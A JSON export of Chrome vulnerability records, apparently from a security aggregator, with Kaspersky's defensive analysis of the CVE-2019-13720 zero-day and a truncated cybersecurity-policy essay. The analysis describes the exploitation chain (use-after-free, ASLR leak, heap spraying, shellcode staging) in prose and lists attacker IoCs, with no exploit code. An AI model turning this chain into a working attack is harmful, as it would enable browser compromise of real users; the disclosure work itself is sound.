"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159"], "modified": "2021-04-07T12:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21159", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-08T13:40:59", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21166", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-04-07T12:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21166", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:12:50", "description": "Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 17, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-25T15:15:00", "title": "CVE-2019-13720", "type": "cve", "cwe": ["CWE-416", "CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2019-13720", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13720", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "mscve": [{"lastseen": "2021-03-18T19:14:17", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21160"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "modified": "2021-03-04T20:03:56", "id": "MS:CVE-2021-21160", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21160", "published": "2021-03-04T20:03:56", "type": "mscve", "title": "Chromium CVE-2021-21160: Heap buffer overflow in WebAudio", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T19:14:16", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21161"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "modified": "2021-03-04T20:03:57", "id": "MS:CVE-2021-21161", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21161", "published": "2021-03-04T20:03:57", "type": "mscve", "title": "Chromium CVE-2021-21161: Heap buffer overflow in TabStrip", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T19:14:16", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21162"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "modified": "2021-03-04T20:03:58", "id": "MS:CVE-2021-21162", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21162", "published": "2021-03-04T20:03:58", "type": "mscve", "title": "Chromium CVE-2021-21162: Use after free in WebRTC", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T19:14:17", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21159"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "modified": "2021-03-04T20:03:55", "id": "MS:CVE-2021-21159", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21159", "published": "2021-03-04T20:03:55", "type": "mscve", "title": "Chromium CVE-2021-21159: Heap buffer overflow in TabStrip", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T19:14:16", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21163"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "modified": "2021-03-04T20:03:59", "published": "2021-03-04T20:03:59", "id": "MS:CVE-2021-21163", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21163", "type": "mscve", "title": "Chromium CVE-2021-21163: Insufficient data validation in Reader Mode", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-03-18T19:14:16", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21166"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n\n**This CVE has been reported to be exploited in the wild.**\n", "modified": "2021-03-04T20:04:01", "id": "MS:CVE-2021-21166", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21166", "published": "2021-03-04T20:04:01", "type": "mscve", "title": "Chromium CVE-2021-21166: Object lifecycle issue in audio", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T19:14:16", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-21164"], "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "modified": "2021-03-04T20:03:59", "published": "2021-03-04T20:03:59", "id": "MS:CVE-2021-21164", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21164", "type": "mscve", "title": "Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2021-04-07T22:49:34", "description": "\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "FreeBSD: VID-F00B65D8-7CCB-11EB-B3BE-E09467587C17 (CVE-2021-21159): chromium -- multiple vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/FREEBSD-CVE-2021-21159/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "securelist": [{"lastseen": "2019-11-27T10:39:00", "bulletinFamily": "blog", "cvelist": ["CVE-2019-13720"], "description": "\n\n## Executive summary\n\nKaspersky Exploit Prevention is a component part of Kaspersky products that has successfully detected a number of zero-day attacks in the past. Recently, it caught a new unknown exploit for Google's Chrome browser. We promptly reported this to the Google Chrome security team. After reviewing of the PoC we provided, Google confirmed there was a zero-day vulnerability and assigned it CVE-2019-13720. Google has released Chrome version 78.0.3904.87 for Windows, Mac, and Linux and we recommend all Chrome users to update to this latest version as soon as possible! You can read Google's bulletin by [clicking here](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>).\n\nKaspersky endpoint products detect the exploit with the help of the exploit prevention component. The verdict for this attack is Exploit.Win32.Generic.\n\nWe are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) attacks that have recently deployed similar false flag attacks.\n\nMore details about CVE-2019-13720 and recent DarkHotel false flag attacks are available to customers of Kaspersky Intelligence Reporting. For more information, contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## Technical details\n\nThe attack leverages a waterhole-style injection on a Korean-language news portal. A malicious JavaScript code was inserted in the main page, which in turn, loads a profiling script from a remote site.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122729/WizardOpium_CVE-2019-13720_01.png>)\n\n_Redirect to the exploit landing page_\n\nThe main index page hosted a small JavaScript tag that loaded a remote script from hxxp://code.jquery.cdn.behindcorona[.]com/. \n\nThe script then loads another script named _.charlie.XXXXXXXX.js_. This JavaScript checks if the victim's system can be infected by performing a comparison with the browser's user agent, which should run on a _64-bit_ version of _Windows_ and not be a _WOW64_ process; it also tries to get the browser's name and version. The vulnerability tries to exploit the bug in _Google Chrome_ browser and the script checks if the version is greater or equal to 65 (current Chrome version is 78):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122743/WizardOpium_CVE-2019-13720_02.png>)\n\n_Chrome version checks in the profiling script (.charlie.XXXXXXXX.js)_\n\nIf the browser version checks out, the script starts performing a number of AJAX requests to the attacker's controlled server (_behindcorona[.]com_) where a path name points to the argument that is passed to the script (_xxxxxxx.php_). The first request is necessary to obtain some important information for further use. This information includes several hex-encoded strings that tell the script how many chunks of the actual exploit code should be downloaded from the server, as well as a URL to the image file that embeds a key for the final payload and RC4 key to decrypt these chunks of the exploit's code.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122755/WizardOpium_CVE-2019-13720_03.png>)\n\n_Exploitation chain - AJAX requests to xxxxxxx.php_\n\nAfter downloading all the chunks, the _RC4_ script decrypts and concatenates all the parts together, which gives the attacker a new JavaScript code containing the full browser exploit. To decrypt the parts, the previously retrieved RC4 key is used.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122805/WizardOpium_CVE-2019-13720_04.png>)\n\n_One more version check_\n\nThe browser exploit script is obfuscated; after de-obfuscation we observed a few peculiar things:\n\n 1. Another check is made against the user agent's string - this time it checks that the browser version is 76 or 77. It could mean that the exploit authors have only worked on these versions (a previous exploitation stage checked for version number 65 or newer) or that other exploits have been used in the past for older Chrome versions. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122818/WizardOpium_CVE-2019-13720_05.png>)\n\n_Obfuscated exploit code _\n\n 2. There are a few functions that operate on the browser's built-in _BigInt_ class, which is useful for doing 64-bit arithmetic inside JavaScript code, for example, to work with native pointers in a 64-bit environment. Usually, exploit developers implements their own functions for doing this by working with 32-bit numbers. However, in this case, _BigInt_ is used, which should be faster because it's implemented natively in the browser's code. The exploit developers don't use all 64 bits here, but instead operate on a smaller range of numbers. This is why they implement a few functions to work with higher/lower parts of the number. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122829/WizardOpium_CVE-2019-13720_06.png>)\n\n_Snippet of code to work with 64-bit numbers_\n\n 3. There are many functions and variables that are not used in the actual code. This usually means that they were used for debugging code and were then left behind when the code was moved to production.\n 4. The majority of the code uses several classes related to a certain vulnerable component of the browser. As this bug has still not been fixed, we are not including details about the specific vulnerable component here.\n 5. There are a few big arrays with numbers that represent a shellcode block and an embedded PE image.\n\nThe analysis we have provided here is deliberately brief due to vulnerability disclosure principles. The exploit used a _race condition_ bug between two threads due to _missing proper synchronization_ between them. It gives an attacker an a _Use-After-Free (UaF)_ condition that is very dangerous because it can lead to code execution scenarios, which is exactly what happens in our case.\n\nThe exploit first tries to trigger _UaF_ to perform an information leak about important 64-bit addresses (as a pointer). This results in a few things: 1) if an address is leaked successfully, it means the exploit is working correctly; 2) a leaked address is used to know where the heap/stack is located and that defeats the _address space layout randomization (ASLR)_ technique; 3) a few other useful pointers for further exploitation could be located by searching near this address. \n\nAfter that it tries to create a bunch of large objects using a recursive function. This is done to make some deterministic heap layout, which is important for a successful exploitation. At the same time, it attempts to utilize a heap spraying technique that aims to reuse the same pointer that was freed earlier in the UaF part. This trick could be used to cause confusion and give the attacker the ability to operate on two different objects (from a JavaScript code perspective), though in reality they are located in the same memory region.\n\nThe exploit attempts to perform numerous operations to allocate/free memory along with other techniques that eventually give the attackers an arbitrary read/write primitive. This is used to craft a special object that can be used with _WebAssembly_ and _FileReader_ together to perform code execution for the embedded shellcode payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122845/WizardOpium_CVE-2019-13720_07.png>)\n\n_First stage shellcode_\n\n## Payload description\n\nThe final payload is downloaded as an encrypted binary (worst.jpg) that is decrypted by the shellcode.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122905/WizardOpium_CVE-2019-13720_08.png>)\n\n_Encrypted payload - worst.jpg_\n\nAfter decryption, the malware module is dropped as updata.exe to disk and executed. For persistence the malware installs tasks in Windows Task Scheduler. \n\nThe payload 'installer' is a RAR SFX archive, with the following information:\n\nFile size: 293,403 \nMD5: 8f3cd9299b2f241daf1f5057ba0b9054 \nSHA256: 35373d07c2e408838812ff210aa28d90e97e38f2d0132a86085b0d54256cc1cd\n\nThe archive contains two files:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01152326/WizardOpium_CVE-2019-13720_code.png>)\n\nFile name: iohelper.exe \nMD5: 27e941683d09a7405a9e806cc7d156c9 \nSHA256: 8fb2558765cf648305493e1dfea7a2b26f4fc8f44ff72c95e9165a904a9a6a48 \n\nFile name: msdisp64.exe \nMD5: f614909fbd57ece81d00b01958338ec2 \nSHA256: cafe8f704095b1f5e0a885f75b1b41a7395a1c62fd893ef44348f9702b3a0deb \n\nBoth files were compiled at the same time, which if we are to believe the timestamp, was \"Tue Oct 8 01:49:31 2019\". \nThe main module (msdisp64.exe) tries to download the next stage from a hardcoded C2 server set. The next stages are located on the C2 server in folders with the victim computer names, so the threat actors have information about which machines were infected and place the next stage modules in specific folders on the C2 server. \n\nMore details about this attack are available to customers of Kaspersky Intelligence Reporting. For more information, contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>). \n\n## IoCs\n\n * behindcorona[.]com\n * code.jquery.cdn.behindcorona[.]com\n * 8f3cd9299b2f241daf1f5057ba0b9054\n * 35373d07c2e408838812ff210aa28d90e97e38f2d0132a86085b0d54256cc1cd\n * 27e941683d09a7405a9e806cc7d156c9\n * 8fb2558765cf648305493e1dfea7a2b26f4fc8f44ff72c95e9165a904a9a6a48 \n * f614909fbd57ece81d00b01958338ec2\n * cafe8f704095b1f5e0a885f75b1b41a7395a1c62fd893ef44348f9702b3a0deb \n * kennethosborne@protonmail.com", "modified": "2019-11-01T16:00:12", "published": "2019-11-01T16:00:12", "id": "SECURELIST:B3F6FE1E8EA0830B8B1306E79A2E63EA", "href": "https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/", "type": "securelist", "title": "Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-07T10:20:58", "bulletinFamily": "blog", "cvelist": ["CVE-1999-0001", "CVE-2019-13720"], "description": "\n\nDespite our continuous research efforts to detect cyberattacks and enable defense, we often feel that we, as members of a global community, are failing to achieve an adequate level of cybersecurity.\n\nThis is threatening the proper development and use of information technologies and digital assets, and as a consequence, most of society's current and future activities, from entertainment to democratic processes, including business, healthcare and industrial production.\n\nWe believe that such a failure can be explained by a lack of global willpower, double-dealing activities, and the lack of global regulations. Here, we develop these hypotheses and outline ideas to advance cybersecurity.\n\n## What we do, and how it is failing\n\nKaspersky's Global Research and Analysis Team ([GReAT](<https://www.kaspersky.com/about/team>)) is made up of cybersecurity researchers. Our shared capabilities and expertise stem from multifaceted individual experiences and perspectives that can always be traced back to strong technical backgrounds. Each and every day, our skills are focused on clear goals: to anticipate, discover, detect, track and report cyberattacks. But our activities and findings are, first and foremost, a contribution to a broader mission: to build a safer world. Since our inception more than a decade ago, we have worked very hard \u2013 from [awareness raising](<https://bestinau.com.au/kasperskys-greats-david-emm-and-david-jacoby-the-importance-of-cyber-security/>) and [media interviews](<https://arstechnica.com/information-technology/2020/08/chinese-hackers-have-pillaged-taiwans-semiconductor-industry/>) to [embedded firmware reverse engineering](<https://securelist.com/hacking-microcontroller-firmware-through-a-usb/89919/>), as well as [incident-response support](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>), [vulnerabilities research](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>), [malicious infrastructure hunting](<https://securelist.com/the-roof-is-on-fire-tackling-flames-cc-servers/33033/>), code similarity [heuristics development](<https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool>), discovery of major threat actors or [advanced malicious frameworks](<https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/>), [open-sourced tools](<https://securelist.com/your-new-friend-klara/85046/>), [specialized training](<https://xtraining.kaspersky.com/>) and expert talks at [world-class conferences](<https://thesascon.com/>). As far as our expertise is concerned, we believe that we provide beneficial results to our customers, partners and the global community. We know from previous collaboration and published content that our colleagues at government bodies, other cybersecurity providers and private companies work just as hard and achieve tremendous results as well.\n\nYet, somehow, we are still failing. Cyberattack numbers, whatever their impact, from digital activities to unwanted or disastrous effects, [keep skyrocketing](<https://securelist.com/all/?category=437>) every year. Cybercrime has never been [so prevalent](<https://www.forbes.com/sites/daveywinder/2020/02/13/the-fbi-issues-a-powerful-35-billion-cybercrime-warning/>) and [real](<https://www.rt.com/uk/495293-cybercrime-on-rise-23-percent/>), reaching every possible device, from [IoT](<https://securelist.com/iot-a-malware-story/94451/>) to [supercomputers](<https://securelist.com/apt-trends-report-q2-2020/97937/>), as well as [network routers](<https://securelist.com/new-wave-of-mirai-attacking-home-routers/76791/>), [smartphones](<https://securelist.com/it-threat-evolution-q1-2020-statistics/96959/>) and [personal computers](<https://securelist.com/bots-and-botnets-in-2018/90091/>). Cyberattacks have become a go-to companion, wherever there is malicious intent to [tackle competition](<https://citizenlab.ca/2020/06/dark-basin-uncovering-a-massive-hack-for-hire-operation/>), [hijack accounts](<https://securelist.com/who-viewed-you-instagram-account-and-who-stole-your-password/74260/>), [spy on a partner](<https://securelist.com/monitorminor-vicious-stalkerware/95575/>), [persecute a minority](<https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/>), [disrupt critical infrastructure](<https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/>), [influence electoral processes](<https://www.intelligence.senate.gov/sites/default/files/documents/report_volume5.pdf>), [steal knowledge](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>) or [obtain money](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>). Cyber-based conflicts keep escalating, to the point where there is now a trend around the globe to proclaim that cyberwar capabilities [are being developed](<https://www.nasdaq.com/articles/so-who-has-most-advanced-cyber-warfare-technology-2017-10-19>), and kinetic force could be used as a response to cyberattacks whenever [deemed fit](<https://fas.org/irp/eprint/dod-cyber.pdf>). And [ransomware](<https://home.kpmg/xx/en/home/insights/2020/05/rise-of-ransomware-during-covid-19.html>) or [state-sponsored cyberattacks](<https://www.ncsc.gov.uk/news/covid-19-exploited-by-cyber-actors-advisory>) kept hitting hard even when we are all confronted with a pandemic.\n\n## Our hypotheses and beliefs\n\nWhy does all that outstanding technical effort, an abundance of cybersecurity solutions, highly skilled workforces, and decades of awareness raising fail to tackle cyberthreats? Although a lack of concern, specialized technical knowledge, skilled resources and training may have kept the defense a few steps behind for a while, we think these factors are no longer a major barrier. Instead, we believe that issues surrounding governance and a sense of responsibility are now what primarily prevent mission success.\n\n### A lack of global willpower and instruments\n\nFirst of all, we believe that there is a lack of high-level global desire for cooperation and governance to properly tackle cyberattacks and protect what is at stake. We all agree that every human being [should be guaranteed](<https://www.ohchr.org/EN/ProfessionalInterest/Pages/InternationalLaw.aspx>) a minimum set of rights, that the development of nuclear warheads [should be limited](<https://www.un.org/disarmament/wmd/nuclear/npt/>), if [not](<https://www.newsweek.com/nuclear-weapons-illegal-nobel-prize-679688>) outlawed, or that warfare [should be regulated and overseen](<https://www.icrc.org/en/war-and-law>). These crucial safeguards to peace and freedom did not come about by chance; they came from political willpower, international cooperation, continuously improved governance and determined enforcement.\n\nHowever, states have not agreed yet about a binding treaty or about how existing international law applies to keep our digital world at peace. There are regular examples demonstrating the major negative effects of cyberattacks on [businesses](<https://www.hydro.com/en/media/on-the-agenda/cyber-attack/>), [nations](<https://www.politico.eu/article/ukraine-cyber-war-frontline-russia-malware-attacks/>) and [citizens](<https://www.kaspersky.com/resource-center/threats/ransomware-examples>) (or "civilians"), and there have been some initiatives to assess how [international law](<https://www.un.org/disarmament/update/the-application-of-international-law-in-cyberspace-state-of-play/>) [would apply](<https://ccdcoe.org/research/tallinn-manual/>) to cyber operations, to [globally](<https://www.interpol.int/Crimes/Cybercrime>) [combat cybercrime](<https://www.europol.europa.eu/about-europol/european-cybercrime-centre-ec3>), or to [establish norms](<https://www.un.org/disarmament/group-of-governmental-experts/>) of responsible [behavior in cyberspace](<https://www.un.org/disarmament/open-ended-working-group/>) for states. But these initiatives are not coordinated or global enough, they don't actually come with the expected regulations, cooperation and clear instruments to increase stability in cyberspace.\n\n**Are we waiting for more dramatic effects** than those already caused by cyberattacks and cybercrime **to advance cybersecurity with strong governance and regulation instruments**? We believe that, on top of the intrinsic complexity of international cooperation, a **crucial lack of willpower from states is preventing substantial advancement** on cybersecurity.\n\n### Double-dealing\n\nWe believe that lots of players are double-dealing in the digital age. Cyberattacks appear to be highly profitable in the short-term, as they allow attackers and their sponsors to quickly and stealthily gather foreign and domestic intelligence, make money, disrupt or deter third parties, gain a strategic advantage over competitors or in warfare, circumvent regulations, or efficiently disseminate information. As a bonus, these malicious activities have a low entry cost, are subject to no monitoring, and for the most part go unattributed (thanks to, amongst other things, complex digital layers, bulletproof services and factors limiting interstate police cooperation). Therefore, perpetrators do not have to take responsibility for their actions and go unpunished \u2013 even when they do get exposed. Due to these convenient "cyber features", state or non-state actors might easily be tempted to publicly promote and even act in favor of a safer world, while making sure they can also benefit from offensive activities that remain undetected and go unpunished. Such activities also promote the public and private development of cyberweapons, mercenary services, criminal activities, and the monetization of vulnerabilities instead of responsible disclosure. All this, in turn, harms the efforts of cybersecurity and enables proliferation.\n\nBut that's not all when it comes to double-dealing: government bodies dedicated to cybersecurity and non-state actors can even play this dangerous game to some extent. Cybersecurity threat intelligence and data are of topmost interest to national defense and security management, as well as very valuable to the competitive cybersecurity business. It is a vital asset to the economy, and for detecting or deterring strategic threats. As a result, threat intelligence may not be shared and actioned as easily and broadly as it should, in a common determined path to cybersecurity, but might rather be guarded jealously for private interests. Private companies such as Kaspersky, however, do their best to proactively [share intelligence](<https://securelist.com>) and [insights on investigations](<https://opentip.kaspersky.com/>) to the community for free.\n\n### Existing regulations are not (global) enough\n\nWe also feel that achieving cybersecurity is not possible without a stronger sense of responsibility from all public and private actors that play a role in the development and operation of our global digital space. Governments have already gone some way to fostering this sense over the years by creating or strengthening regulations on personal data processing or protection for critical information systems. While this has been a significant advancement towards cybersecurity, it has unfortunately not been enough.\n\nMost of the cyberattacks we face and analyze do not actually leverage sophisticated technical vulnerabilities or tools, because they don't need to. It is often way too easy to access the [devices and networks](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>) owned by a public or private organization because elementary cybersecurity measures are still not implemented, and because the organization's very own digital assets are not clearly identified or not controlled sufficiently. Every organization that processes digital data of personal significance, or develops or operates digital services, starting with those that benefit us the most, or contribute to our most vital needs, including governments, should be required to implement and demonstrate elementary cybersecurity frameworks. The associated regulations should be global, because cyberspace and digital assets are shared amongst all users around the world. It may not be possible to [become invulnerable](<https://securelist.com/you-cant-be-invulnerable-but-you-can-be-well-protected/73160/>), but making cyberattacks more costly for the attackers while protecting our digital world a little more is doable.\n\nOn top of the lack of preventive and protective measures from many public and private organizations, another responsibility issue is blocking the road to cybersecurity. Cyberattacks cannot be carried out without leveraging publicly available commercial services, such as content hosting, development, infrastructure provision and mercenary services. First, it would seem obvious that any private organization that purposely engages in cyberattack operations or cyberweapons development should have its activities limited by regulations, and controlled by an impartial third party, in order to ensure that malicious activities are constrained by design, and that cyberweapons do not proliferate. Also, in order to maintain peace in the cyberworld, it is critical that any organization whose services are demonstrated to be leveraged to carry out cyberattacks is required to cooperate with cybersecurity organizations designated by an impartial third party, to contribute to cybersecurity investigations and demonstrate efforts to continuously prevent the malicious use of exposed services.\n\nDigital services and information technologies that unintentionally support malicious cyber activities are \u2013 most of the time \u2013 developed to bring sound and useful outcomes. However, and for decades, [vulnerability disclosures](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0001>) and cyberattacks have demonstrated that some technologies or uses are flawed by design and can be exploited by malicious actors. We can probably collectively accept that when the first information technologies were [developed](<https://hbr.org/1958/11/management-in-the-1980s>) and [deployed](<https://www.cs.princeton.edu/courses/archive/fall06/cos561/papers/cerf74.pdf>), it wasn't easy to anticipate malicious uses, which is why cybersecurity efforts only came afterwards. But it is no longer possible nor tolerable to develop, deploy and operate technologies and services that have a global use potential, while ignoring existing threats, and without making them secure by design. Yet, even more vulnerabilities and malicious uses affect relatively modern services and technologies, from [IoT](<https://securelist.com/on-the-iot-road/91833/>) and [artificial intelligence systems](<https://www.belfercenter.org/publication/AttackingAI>) to [cloud infrastructures](<https://media.defense.gov/2020/Jan/22/2002237484/-1/-1/0/CSI-MITIGATING-CLOUD-VULNERABILITIES_20200121.PDF>), [robotics](<https://securelist.com/robots-social-impact/94431/>) and [new mobile networks](<https://securelist.com/5g-security-for-smart-cities/95057/>). In order to anticipate and prevent malicious exploitation of modern technologies as much as it is reasonably possible, we believe that transparent vulnerability management and disclosure practices [need to be developed further](<https://front.un-arm.org/wp-content/uploads/2020/03/kaspersky-position-paper-on-oewg-first-pre-draft-report.pdf>) by both state and non-state actors; and that technologies or services that are used globally should be assessed by a global community of experts more often.\n\nLast but not least, we also think that more threats could be better anticipated in the future if future generations are globally and systematically educated on information technologies and cybersecurity, whatever their origin or path. This will contribute to a safer world.\n\n## Our call and plans\n\nIt is rather unusual for cybersecurity researchers and experts to write on governance matters. We don't pretend that our hypotheses are the most suitable, or the most comprehensive. But we definitely feel concerned, and 